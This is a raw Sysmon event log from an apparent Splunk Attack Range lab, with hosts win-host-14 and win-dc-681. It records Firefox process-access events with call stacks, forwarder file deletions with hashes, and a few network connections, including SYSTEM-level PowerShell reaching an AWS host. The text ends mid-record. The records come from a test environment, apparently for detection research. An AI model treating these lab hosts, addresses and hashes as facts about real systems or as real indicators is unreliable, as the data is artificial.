Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151527Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.252{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151526Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.219{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=551ED08C111F2AE8E75FE06E46746351,SHA256=01ADDC40179D9CE1361C3DA9878427834BC7D877829AF687DEFBD88ABC743462,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151525Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.204{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151524Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.197{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151523Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.182{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151522Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:18.182{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104952Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:19.887{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBCE687BDEBAE94A7A14B1A6BA563894,SHA256=E00500C93EBFAED1776499F73BF53A4E303A2E5BB223266884C3A4B32A595A7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104951Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:17.919{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55420-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151543Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.781{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573A8DEFCD9F37EB8D903D1A538372A0,SHA256=9DCE135172F795DB7D30C87C406AA7A546A61C92D6FEE019FFCD03AB0D9E732A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151542Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.750{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151541Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.750{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151540Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.750{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151539Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.734{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151538Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.718{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151537Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.718{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151536Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.681{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000151535Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.681{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 10341000x8000000000000000151534Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.565{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba 10341000x8000000000000000151533Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:19.565{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 10341000x8000000000000000151546Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:20.917{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb|C:\Program Files\Mozilla Firefox\xul.dll+4025f|C:\Program Files\Mozilla Firefox\xul.dll+1230b8e 10341000x8000000000000000151545Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:20.917{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 23542300x8000000000000000151544Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:20.798{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B504BC9F6A75A2B7FF5251FBB7B7A93D,SHA256=7869CB3EA1022E36DE1FC6D18E01A17BE1B73D60682B1D422058AF7945FD11BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104954Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:21.940{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2638B5433A22D46AFB4570F5AC2846CC,SHA256=A57BAA8417DDE0AA8563C573B8CA1D3A716D4A6FB07DA926857896804990DA3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104953Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:21.257{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF3A7F6CA65F40B57EB6252A6D56185C,SHA256=4B20D61EDD5DD6D77C68E95214ED1B6F7E07683640AC0F0281C93588646E1B6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151547Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:21.816{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E4C918E6A48B9A06C15DE89FACB1BB,SHA256=ED50AECECD0FE16BDC294383A7E6B5325F6FF84BE5C4D1F1AB4F919CD4D80BCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104955Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:22.622{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA157A3BE6D2D0FD0EF2ACB4C58D0BE0,SHA256=F38669E153110E25F8928C47D8A7B303A7A272BCA111D794F9352EABA5D172D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151550Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:22.831{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB7DF226EF93061F208FE341A02EF026,SHA256=17D9C2D985E2380BD7B04A8CD4E5CF5662D73C178BEAB7641958168F689DDDDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151549Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:21.253{39BD8DE3-26DA-60CA-F703-00000000D101}5228C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58405-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000151548Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:22.647{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D77117DD52428161266EF26B27D6DCB8,SHA256=024F48AFFB1CA343334B8E8433679187FC40B872D9A6C98D193BA976DF8091EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104956Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:23.981{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC62805F2FCC1CCB6B3CC3DEE124167,SHA256=4D921C223170573E3DE9DCBE2214ADB346953656CB0B9A30C800741EE9297863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151552Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:23.931{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C91F4C07721A5E5BC3CEEDB6BA4B7790,SHA256=B58E5B9792F8D197051CA0677C45F8BA66670336669C5243D6ABA5B30217AD2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151551Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:21.998{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58406-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151553Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:24.946{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 